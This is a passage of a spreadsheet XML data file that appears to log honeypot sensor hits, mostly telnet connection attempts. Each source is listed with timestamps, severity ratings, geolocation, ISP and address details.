    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="Nassau"/>
    <s v="Hicksville"/>
    <s v="5120656"/>
    <s v="11801"/>
    <s v="40.76"/>
    <s v="-73.5044"/>
    <s v="6128"/>
    <s v="Cablevision Systems Corp."/>
    <s v="Cablevision Systems Corp."/>
    <s v="business"/>
    <s v="Static IP Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6caa:4dee"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2866"/>
    <x v="2866"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T13:57:13"/>
    <d v="2025-04-06T13:57:13"/>
    <d v="2025-04-06T13:57:13"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BY"/>
    <s v="Belarus"/>
    <s v="MI"/>
    <s v="Minsk"/>
    <s v="Barysaw District"/>
    <s v="Borisov"/>
    <s v="630376"/>
    <s v="222120"/>
    <s v="54.2279"/>
    <s v="28.505"/>
    <s v="6697"/>
    <s v="BELPAK-AS"/>
    <s v="Belpak"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b27c:bb13"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2867"/>
    <x v="2867"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T13:21:11"/>
    <d v="2025-04-06T13:21:11"/>
    <d v="2025-04-06T13:21:11"/>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3d00:9d79"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2868"/>
    <x v="2868"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T13:14:18"/>
    <d v="2025-03-19T13:43:08"/>
    <d v="2025-04-06T13:14:18"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H43"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:2c3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2869"/>
    <x v="2869"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T13:11:36"/>
    <d v="2025-04-06T13:11:36"/>
    <d v="2025-04-06T13:11:36"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:8140"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2870"/>
    <x v="2870"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T12:50:50"/>
    <d v="2025-04-06T12:50:50"/>
    <d v="2025-04-06T12:50:50"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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1:9723"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2871"/>
    <x v="2871"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T12:26:17"/>
    <d v="2025-04-06T12:26:17"/>
    <d v="2025-04-06T12:26:17"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0571"/>
    <s v="121.614"/>
    <s v="7482"/>
    <s v="APOL-AS"/>
    <s v="Asia Pacific On-line Service Inc."/>
    <s v="corporate"/>
    <s v="Asia Pacific On-line Services Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7cda:5d39"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2872"/>
    <x v="2872"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T12:23:06"/>
    <d v="2025-04-06T12:13:07"/>
    <d v="2025-04-06T12:23:06"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:506e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2873"/>
    <x v="2873"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T11:59:09"/>
    <d v="2025-04-02T15:24:39"/>
    <d v="2025-04-06T11:59:09"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="CY"/>
    <s v="Cyprus"/>
    <s v="01"/>
    <s v="Nicosia"/>
    <s v="NA"/>
    <s v="Nicosia"/>
    <s v="146268"/>
    <s v="NA"/>
    <s v="35.1753"/>
    <s v="33.3642"/>
    <s v="44558"/>
    <s v="Netonline Bilisim Sirketi LTD"/>
    <s v="Netonline Bilisim Sirketi LTD"/>
    <s v="business"/>
    <s v="Netonline Bilisim Sirketi LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5db6:46cd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2874"/>
    <x v="2874"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T11:38:21"/>
    <d v="2025-04-06T11:38:21"/>
    <d v="2025-04-06T11:38:21"/>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f:b0b6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2875"/>
    <x v="2875"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T11:30:14"/>
    <d v="2025-04-06T11:27:11"/>
    <d v="2025-04-06T11:30:14"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c3:170f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2876"/>
    <x v="2876"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T11:29:13"/>
    <d v="2024-08-27T02:41:35"/>
    <d v="2025-04-06T11:29:13"/>
    <n v="141"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;6917&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25e5:850"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2877"/>
    <x v="2877"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T11:00:57"/>
    <d v="2025-04-03T17:07:41"/>
    <d v="2025-04-06T11:00:57"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e2e:452b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2878"/>
    <x v="2878"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T11:00:51"/>
    <d v="2025-04-05T09:15:59"/>
    <d v="2025-04-06T11:00:51"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="AR"/>
    <s v="Aragon"/>
    <s v="Saragossa"/>
    <s v="Villamayor de Gállego"/>
    <s v="11994483"/>
    <s v="NA"/>
    <s v="41.6858"/>
    <s v="-0.7723"/>
    <s v="12430"/>
    <s v="VODAFONE ESPANA S.A.U."/>
    <s v="Vodafone Global Enterprise Inc."/>
    <s v="business"/>
    <s v="Vodafone Spain"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2f3d:6a34"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2879"/>
    <x v="2879"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T11:00:43"/>
    <d v="2025-04-03T12:57:58"/>
    <d v="2025-04-06T11:00:43"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Hung Hom"/>
    <s v="1819718"/>
    <s v="NA"/>
    <s v="22.3031"/>
    <s v="114.192"/>
    <s v="10118"/>
    <s v="HGC Global Communications Limited"/>
    <s v="HGC Global Communications Limited"/>
    <s v="cellular"/>
    <s v="Domain Five Enterprises Ltd"/>
    <s v="2009-09-17"/>
    <s v="H3GHK"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b4bc:9357"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2880"/>
    <x v="2880"/>
    <s v="NA&amp;&amp;syn-047-040-030-211.res.spectrum.com"/>
    <x v="0"/>
    <d v="2025-04-06T11:00:43"/>
    <d v="2025-03-21T10:28:18"/>
    <d v="2025-04-06T11:00:43"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MO"/>
    <s v="Missouri"/>
    <s v="Saint Louis"/>
    <s v="Charlack"/>
    <s v="4380976"/>
    <s v="NA"/>
    <s v="38.7049"/>
    <s v="-90.3466"/>
    <s v="20115"/>
    <s v="Charter Communications"/>
    <s v="Charter Communications"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2f28:1ed3"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2881"/>
    <x v="2881"/>
    <s v="NA&amp;&amp;p4170130-ipxg12701sapodori.hokkaido.ocn.ne.jp"/>
    <x v="0"/>
    <d v="2025-04-06T10:10:35"/>
    <d v="2025-04-06T10:09:35"/>
    <d v="2025-04-06T10:10:35"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-8111"/>
    <s v="35.6916"/>
    <s v="139.768"/>
    <s v="4713"/>
    <s v="NTT Communications Corporation"/>
    <s v="Open Computer Network"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2003-03-03"/>
    <s v="OCN-JPNIC-JP"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['ns1.ocn.ad.jp', 'ns2.ocn.ad.jp']"/>
    <s v="NA"/>
    <s v="Connected (2025/11/30)"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc6b:e582"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2882"/>
    <x v="2882"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T10:01:23"/>
    <d v="2025-02-19T05:56:19"/>
    <d v="2025-04-06T10:01:23"/>
    <n v="62"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;44937&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc7a:7290"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2883"/>
    <x v="2883"/>
    <s v="114-32-209-156.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-06T10:00:56"/>
    <d v="2025-03-03T20:59:39"/>
    <d v="2025-04-06T10:00:56"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7220:d19c"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2884"/>
    <x v="2884"/>
    <s v="NA&amp;&amp;ec2-13-218-176-166.compute-1.amazonaws.com"/>
    <x v="0"/>
    <d v="2025-04-06T09:58:29"/>
    <d v="2025-04-06T08:10:53"/>
    <d v="2025-04-06T09:58:29"/>
    <n v="38"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_REDIS_HC1"/>
    <s v="21&amp;&amp;6379&amp;&amp;3306&amp;&amp;5432&amp;&amp;389&amp;&amp;23&amp;&amp;8443&amp;&amp;110&amp;&amp;143"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20149"/>
    <s v="39.0438"/>
    <s v="-77.4874"/>
    <s v="14618"/>
    <s v="Amazon.com, Inc."/>
    <s v="Amazon.com, Inc."/>
    <s v="hosting"/>
    <s v="Amazon Technologies Inc"/>
    <s v="2019-10-01"/>
    <s v="AT-88-Z"/>
    <s v="2021-02-10"/>
    <s v="connection&amp;&amp;command&amp;&amp;GET"/>
